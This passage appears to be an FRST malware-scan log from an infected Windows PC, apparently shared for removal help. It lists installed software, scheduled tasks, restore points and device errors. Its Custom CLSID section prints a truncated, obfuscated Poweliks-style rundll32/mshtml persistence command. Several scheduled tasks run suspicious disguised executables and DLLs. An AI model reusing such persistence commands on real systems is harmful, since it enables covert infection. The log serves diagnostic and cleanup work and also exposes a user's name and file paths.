Japanese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Korean (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Polish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Thai (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hiddenccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hiddenccc-utility (Version: 2007.0731.2234.38497 - ATI) HiddenCCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)Destination Component (Version: 110.0.0.0 - Hewlett-Packard) HiddenDeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) HiddenDocMgr (Version: 120.0.000.000 - Hewlett-Packard) HiddenDocProc (Version: 12.0.0.0 - Hewlett-Packard) HiddenEDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )Fax (Version: 120.0.194.000 - Hewlett-Packard) HiddenFeedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) HiddenHP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) HiddenHPSSupply (Version: 120.0.194.000 - Hewlett-Packard) HiddenHTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) HiddenMediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) HiddenMicrosoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) HiddenMicrosoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version: - Microsoft)Microsoft Office 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) HiddenMicrosoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) HiddenMicrosoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)Network (Version: 120.0.194.000 - Hewlett-Packard) HiddenOCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)ProductContext (Version: 50.0.165.000 - Hewlett-Packard) HiddenQuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - )Roxio Creator Audio (Version: 3.7.0 - Roxio) HiddenRoxio Creator Copy (Version: 3.7.0 - Roxio) HiddenRoxio Creator Data (Version: 3.7.0 - Roxio) HiddenRoxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)Roxio Creator DE (Version: 3.7.0 - Roxio) HiddenRoxio Creator Tools (Version: 3.7.0 - Roxio) HiddenRoxio Express Labeler 3 (Version: 3.2.1 - Roxio) HiddenRoxio Update Manager (Version: 6.0.0 - Roxio) HiddenSAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) HiddenScan (Version: 12.0.0.0 - Hewlett-Packard) HiddenShop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)Skins (Version: 2007.0731.2234.38497 - ATI) HiddenSmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) HiddenSolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) HiddenSpelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)Status (Version: 120.0.194.000 - Hewlett-Packard) HiddenToolbox (Version: 120.0.194.000 - Hewlett-Packard) HiddenTransporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)TrayApp (Version: 120.0.194.000 - Hewlett-Packard) HiddenUnloadSupport (Version: 11.0.0 - Hewlett-Packard) HiddenUpdate for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version: - Microsoft)Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version: - Microsoft)Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version: - Microsoft)Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version: - Microsoft)Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version: - Microsoft)Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= 25-07-2014 04:00:07 Scheduled Checkpoint29-07-2014 11:25:23 Scheduled Checkpoint30-07-2014 11:45:57 Scheduled Checkpoint01-08-2014 21:10:36 Scheduled Checkpoint02-08-2014 16:42:56 Scheduled Checkpoint04-08-2014 04:00:03 Scheduled Checkpoint07-08-2014 22:48:19 Scheduled Checkpoint11-08-2014 02:11:41 Scheduled Checkpoint11-08-2014 15:01:42 Scheduled Checkpoint12-08-2014 10:45:08 Scheduled Checkpoint14-08-2014 02:36:25 Scheduled Checkpoint14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14 17:5914-08-2014 23:31:34 Advanced-System Protector15-08-2014 23:47:04 Removed SofTest16-08-2014 13:18:06 Removed DriverUpdate16-08-2014 13:29:10 Removed HTC Sync.16-08-2014 13:44:46 Removed HTC Sync.16-08-2014 14:02:17 Removed HTC BMP USB Driver.16-08-2014 16:47:50 Advanced-System Protector16-08-2014 21:58:06 Installed AVG 201416-08-2014 22:11:41 Removed SlimCleaner Plus16-08-2014 22:14:50 Removed HTC Driver Installer.17-08-2014 19:56:09 Installed AVG 201417-08-2014 19:59:04 Installed AVG 201417-08-2014 20:03:04 Removed AVG 201417-08-2014 20:04:51 Installed AVG 201117-08-2014 21:08:16 Installed AVG 201417-08-2014 21:16:20 Installed AVG 201417-08-2014 21:24:43 Removed AVG 201417-08-2014 21:26:10 Installed AVG 201119-08-2014 21:04:48 Advanced-System Protector21-08-2014 01:40:12 Advanced-System Protector23-08-2014 20:47:11 Checkpoint by HitmanPro ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2014-08-23 14:19 - 2014-08-23 14:19 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts127.0.0.1 localhost ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMMTask: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTIONTask: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exeTask: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exeTask: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exeTask: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServerTask: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UITask: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exeTask: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPagesTask: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exeTask: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exeTask: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTIONTask: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exeTask: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll" (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exeTask: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe ==================== Loaded Modules (whitelisted) ============= 2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll2008-08-06 15:17 - 2007-08-20 01:08 - 00159744 _____ () C:\Windows\system32\atitmmxx.dll2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= Name: Microsoft 6to4 Adapter #2Description: Microsoft 6to4 AdapterClass Guid: {4d36e972-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: tunnelProblem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)Resolution: Update the driver Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 1022nDescription: HP LaserJet 1022nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6940 seriesDescription: Deskjet 6940 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: hp LaserJet 2420Description: hp LaserJet 2420Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet CP1025nwDescription: HP LaserJet CP1025nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 200 color M251nwDescription: HP LaserJet 200 color M251nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors:==================Error: (08/23/2014 04:24:01 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\HISTORY-JOURNAL> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:53 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\MANIFEST-000002> in the hash map cannot be updated. 